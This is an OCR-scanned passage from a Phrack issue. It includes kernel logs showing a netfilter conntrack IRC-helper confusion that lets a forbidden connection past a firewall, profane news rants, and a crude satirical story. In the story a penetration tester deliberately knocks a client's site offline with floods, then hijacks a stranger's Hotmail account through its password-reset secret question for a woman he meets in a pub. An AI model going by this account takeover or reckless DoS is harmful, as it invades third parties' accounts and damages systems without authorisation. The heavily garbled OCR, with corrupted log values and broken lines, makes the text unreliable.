<CR> was accepted because it was regarded as a packet that had a wrong 
sequence position. (i.e., the packet was not regarded as an FTP command) 


Dec 31 15:03:40 hans kernel: ip_conntrack_in: normal packet for d7369080 
Dec 31 15:03:40 hans kernel: conntrack_ftp: datalen 23 

Dec 31 15:03:40 hans kernel: conntrack_ftp: datalen 23 ends in \n 

Dec 31 15:03:40 hans kernel: ip_conntrack_ftp_help: wrong seq pos 
(1273167394) 


->The following shows that the connection-tracking module mistook the FTP 
data connection for IRC. 


Dec 31 15:03:40 hans kernel: ip_conntrack_in: new packet for d73691c0 
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:entered 

Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:Conntrackinfo = 2 
Dec 31 15:03:40 hans kernel: Confirming conntrack d73691c0 
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->The following shows that ip_conntrack_irc mistook the packet contents of 


fak 


detected 


3731565152 


-> 


the FTP data connection for a DCC CHAT command and "expected" th 
chatting connection. 

Dec 31 15:03:40 hans kernel: ip_conntrack_in: normal packet for d73691c0 
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:entered 

Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:DCC found in master 
192.168.4.4:20 192.168.3.3:6667... 

Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:DCC CHAT 

Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:DCC bound ip/port: 
192.168.4.4:8000 

Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:tcph->seq = 

Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:wrote info 
seq=1613392874 (ofs=33), len=21 

Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:expect_related 
0.0.0.0:0-192.168.4.4:8000 

Dec 31 15:03:40 hans kernel: ip_conntrack_expect_related d73691c0 

Dec 31 15:03:40 hans kernel: tuple: tuple d6c61d94: 6 0.0.0.0:0 -> 
192.168.4.4:8000 

Dec 31 15:03:40 hans kernel: mask: tuple d6c6lda4: 65535 0.0.0.0:0 
299+2555255.2595'65535 

Dec 31 15:03:40 hans kernel: new expectation d7cf82e0 of conntrack d73691c0 


->The following shows that ip_conntrack, 


after all, 


accepted th 


illegal 


connection to port 8000 under the stateful inspection rule. 


Dec 31 15:03: 


exp=d7cf82e0 
Dec 31 15:03 
Dee. 3. 15703 
Dec 31 15:03 


40 


241 
241 
241 


hans kernel: 


hans kernel: 
hans kernel: 
hans kernel: 


conntrack: 


ip_conntrack_in: 
Confirming conntrack d7369260 
ip_conntrack_in: 


expectation arrives ct=d7369260 


related packet for d7369260 


normal packet for d7369260 
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==Phrack Inc.== 


Volume O0x0b, Issue O0x3f, Phile #0x14 of 0x14 


| [ WORLD N 


ea 
= 
n 


*** NSA & PHRACK *** 


And in a positive way. See: 
http://www.nsa.gov/snac/ 


Which has a section specifically for routers: 
http://www.nsa.gov/snac/downloads_cisco.cfm?MenuID=scg10.3.1 


And on page 80 Phrack is at the top of the list of references. 
*x** QUICK NEWS **** QUICK NEWS **** QUICK N 


*x** QUICK NEWS **** QUICK NEWS **** QUICK N 
**** QUICK NEWS **** QUICK NEWS **** QUICK N 


= 


x**** QUICK NEWS **** 
x**** QUICK NEWS **** 
x**** QUICK NEWS **** 


Aww 
= 


= 


And once gain ... two big companies, Cisco and ISS, try to scare free 
researchers to not talk about the problems in their software. 


Michael Lynn has shown great courage and made use of his natural-born 
rights: to talk. 


Quote from his homepage: 


‘People who know me will tell you I have a long history of 
not being afraid of people I should.’ 


Kudos to Lynn from the Staff @ Phrack. 
From Michael Lynn’s homepage: 


A dangerous culture regarding hardware based network devices as impervious 
to remote compromise has been allowed to exist. Mike has taken on enormous 
personal risk to do the right thing for the security research community by 
coming forward with his research and bringing this problem into focus. 


Cisco has consistently been on the forefront of this dangerous culture. They 
exercise a strategy of walling off updates and information only to those 
with support contracts. In many areas of critical infrastructure, engineers 
are often limited in their ability to utilize the latest security updates 
due to their IOS feature train. For years, attempting to adopt SSH as the 
primary method of administration for Cisco hardware has provided a perfect 
example of Cisco’s broken security culture. Their handling of this situation 
is putting icing on the cake. We must encourage change in Cisco’s security 
culture. 


ISS’s actions to date have shown an effect of this broken security culture. 
ISS’s handling of this critical security threat and the researcher that 
found it have been less then desirable. We are confident our free-market 
business and media environment will result in both ISS and Cisco learning 
lessons from this event. 


http: //www.nicklevay.net/ 
http://blogs.pcworld.com/staffblog/ 
http://blogs.washingtonpost.com/securityfix/2005/07/update_to_cisco.html 


Welcome to Austin/Texas International Airport. Please check out our 
new camera system. We can spy on our employees, our citizans and 
even on our president. Try it out now: 
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http://lobbycamera4.abia.org 


Microsofts goes 133t: The 31337 dictionary 
http://www.microsoft.com/athome/security/children/kidtalk.mspx 


This is a big fuckup of what happens if you dont watch out: 

1) An attack happens 

2) Politicans scare the shit out of the people and tell them it will 
happen again! 

3) People accept to give up their rights, their freedom and their brain. 

4) People get fucked by what the policticans told them would help 
against terror. 


Ladies and Gentlemen, the TSA-FUCKUP: 
http://www.komotv.com/stories/37150.htm 


I love this quote: And I said what about my constitutional rights? And 
they said ’not at this point ... you don’t have any’." 


DVD copy software illegal in the netherlands. 
http://www.theregister.co.uk/2005/07/25/dvd_copy/ 
http: //www.theregister.co.uk/2005/07/25/uk_war_driver_fined/ 


Wait a moment? The software? I would even protest if it would 
be the act of copying. But the software? What fuckup is this? 


buy a DVD 

buy software to copy DVD 

make a copy of my OWN DVD for MY OWN purpose 
make a copy of my OWN DVD for my FRIEND 
make a copy of my friends DVD for MY FRIEND 
make a copy of my friends DVD for ME 
make MANY copies of my friends DVD for OTHERS 


YHOBWNE 
HH HAHAH H 


So where does warez trading start? Netherlands, that was a bad move. The 
people of the Netherlands are not stupid. They will never allow you to 
forbid them to make a copy of their own DVDs. And for sure you will never 
ever be able to forbid them to develop and research software to copy 

DVDs or any other software. 


Other countries would have sponsored smart guys who can write such software. 
The people of the Netherlands will fight for their rights. Free speech & free 
research will win in the end. 


| 
|=[ Social Penetration Testing ] 
| 


By Pascal Cretain (Pascal_Cretain@mail.com) 


I’ say with certainty that the MD5 checksum of each and every one of the 

last, say 200 days has not been tampered with and is the same in all cases. 
It’s yet another dull day in the office and I’m bored out of my f***ing skull. 
This new client not only wants an ’external blind pen test’ they also want 
‘comprehensive static code analysis’. Why they are paying money to ’secure’ 
this monstrosity is beyond me. It doesn’t even have an authentication 

section. Bollocks. 
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A DNS zone transfer request greets me cheerfully with all their internal 
network structure...not that I will need that since they have only asked 
for webserver testing but it’s good to know anyway. I launch that damn 
nessus scan for the millionth time and I senselessly wait for the attack 
progress bar to complete’no joy. I fire up Nikto, Webscan, N-Stealth AND 
ISS at the same tim nabling all dangerous plugins in an attempt to DoS 
this ugly webserver, certainly not running Free/GNU open source software 
but something proprietary and expensive starting from I and ending in IS. 
In addition to that I launch independent SYN FLOOD attacks and distributed 
teardroping to improve my chances of achieving the goal. Soon, the website 
falls clumsily like a non-armoured villager in the battle of Waterloo. 


I smile with content as the overbloated, dysmorphic, dynamic html pages are 
soon replaced with a plain, powerful, beautiful and snowy white 404 error. 
A minute of silence and peace is instantly shattered by the phone ringing. 
It’s the operations manager. 


- Pascal, they people from Dorksershire_Upon_Avon just called me complaining 
that the website is down. Does that have something to do with the pen 
testing we perform? 


- Well , partially yes, I respond. And then, more aggressively I explain 
"If the client wants a penetration test to be complete they have to get 
their website tested against Denial Of Service Attacks, the most innocuous 
and common type of attack nowadays. They will thank us for that, 
eventually. Moreover, we had warned them about the danger of DoS when 
they signed the contract. Despite the fact that we tak very precaution 
to avoid such a side-effect, DoS is a risk that comes bundled with proper 
testing. I clearly remember that sales guy. He’d thought that with the 
term DoS I meant that black, command-line pre-windows OS, the one that 
mptied the screen when you typed CLS. Oh well. 


— Thank you Pascal, I will inform them. 


It’s already 4+30...I’d like to escap arlier today, especially now, after 
the DoS unfortunate ’incident’ that has put a temporary pause to our duties 
I can’t do much. 


The operations manager is now gone, or he might even be in the loo, who 
cares, now is my ultimate chance to scram. Within seconds, literally, I’m 
sitting right in the middle of the ’Thirsty Fox’ pub. Oooh I love this 
place. 


-— Pint of John Smith’s please 
- Sure mate 

— Cheers 

— Cheers 


A fractal amount of ale gets spilled over the counter 


- Sorry 
—- Sorry 
- That’s all right mate 
- Cheers 
- Cheers 


I grab the glass and drink half of the beer in one go. Then I look around 
for female presence vulnerable to man in the middle attack. Equipped with 
my brand new /’penetration testing anyone?’ t-shirt, I can’t lose. 

There she is! Black hair, my type. I down the rest of my drink, order 
another pint. 


—- Pint of John Smith’s please 

- Sure mate 

—- Cheers 

—- Cheers 

I Grab the glass and make my move. 
— Hey 
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I 


Hiya. 

You come here often? I say with an epic voice 

Yeah , quite often she responds uninterested 

You know, I’m a penetration tester. My voice is deep and certainly erotic. 
*Silence* 

I’m a hacker, I say, and I get paid to do it. 

Ha. That’s interesting. Do you hack hotmail? 

Of course, I respond confidently. I’m a Hotmail Hacking Certified Revers 
Engineer and president of the British Open Source institute for 
...mm...E-mail Compromise (HHCRE&PBOSIEC) 

Wow, she says impressed. Could you offer me your valuable help then please? 
There is a particular email account that I have forgotten the password for 
and has critical information for me. The account is 
Brutus_Needham@hotmail.com...Would you help me hack it? 

Sure, no worries. Why don’t we finish these drinks and be gone, I live 
nearby. In my place I got 1Gb Download/512MB X-DSL access, 3 workstations 
and 2 mainframes running different command-line OSs. In the worst case 
scenario, we can always run a distributed john the ripper dictionary attack 
using my VERY LONG AND THICK dictionaries, I say in an attempt to impress. 
The girl is moving her head, looking somehow puzzled. We’1l sort out your 
Situation in a jiffy, I add to simplify things. Say, how can this be your 
email account, tho’? isn’t that a man’s name? I say while blinking at the 
same time. 

Well. _blush_ ok you got me! It’s my darn ex boyfriend and I have to find 
out what he has been doing! If you don’ mind. 

No worries, we can take care of that. I’m glad I can be of assistance. 
Your female friend can join us as well if she feels like a ’small 
penetrating class’ free of charge!, I say, while making some fast, and 
certainly erotic & meaningful gestures. 

Yeah, why not! sounds like fun! , both girls reply. 

Bingo. Let’s get to some real penetration testing, I think to myself while 
smiling. 


don’t own a car since I believe that it’s a good idea not to acquire 


products that will make your life more stressful and costly. Why pay car 
insurance, petrol and refrain one’s self from the wonderful act of drinking 
John Smith’s when you can use public transport completely wasted, or walk, 
or cycle (wasted). Generally, I consider that people should only buy goods 
that they absolutely need. An oscilloscope, for instance, is an example of 
an absolutely necessary device, that’s why I own two of them. Other than 
that, not owning things provides the luxury of being flexible, free, and 
ensures you tread lightly on this earth. Anywayz. 


So we walk home, myself in the middle , girls on both sides. 


So, what’s your name, hacker? One of the girls asks. 

Pascal, I reply. Pascal Cretain. 

Ha, this is not a very usual name. Where do you come from , Pascal? 

I come from the land of Compromise. I respond, looking at the void. 

You are an interesting one, Pascal. I honestly hope you’re not 
bullshiting around with us. 

As a true hacker, I will speak with actions and not with useless words, 
I say. Just wait till we crack that Brutus who needs ham, girl. 


Soon, all three of us are sitting comfortably in my messy ’IT room’. One 
of the girls asks: 


—- Hey, where is your equipment mate? Didn’t you say you had five computers 


with X-LSD internet? All I can see is a shitty laptop! What’s going on? 
And where is the LSD? 


Don’t worry honey, I reply with a calm voice. My computer equipment is all 
here. But not quite. This laptop basically is the access point to my REAL 
IT infrastructure, which resides somewhere near very near. Unfortunately, 
due to non-disclosure confidentiality agreements, I cannot inform you of 
the real location of my computers, nor show you around, tho’ I’d love 

to - sigh. The girls are gazing at me, unconvinced 
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- Oh well , whatever. D’you have anything we can drink then? 


- Sure, I got John Smith’s premium Ale. They grab a can each and start 
chatting about online shopping. 


I grab a can and quickly get to work . I browse to passport.net, then reset 
password, choose country, type in the username....wait for the Brutus’ 
‘Secret’ question. Fuck yeah! 


—- Hey, girl, you didn’t tell me your name. I ask the ’interested party’. 
‘Jude’ she responds..I type in the answer to Brutus’s secret question, 
then reset the password to ’Oscilloscoped’ 

—- Mine is Gloria , the other girl says. 

—- Hey Jude, I says. Wanna come over here? I got somethin’ for you. Fact I 
got two. I blink. 


Both girls approach. I sit back and smile. 
It’s not such a bad day after all. 


|=[ EOF ] 


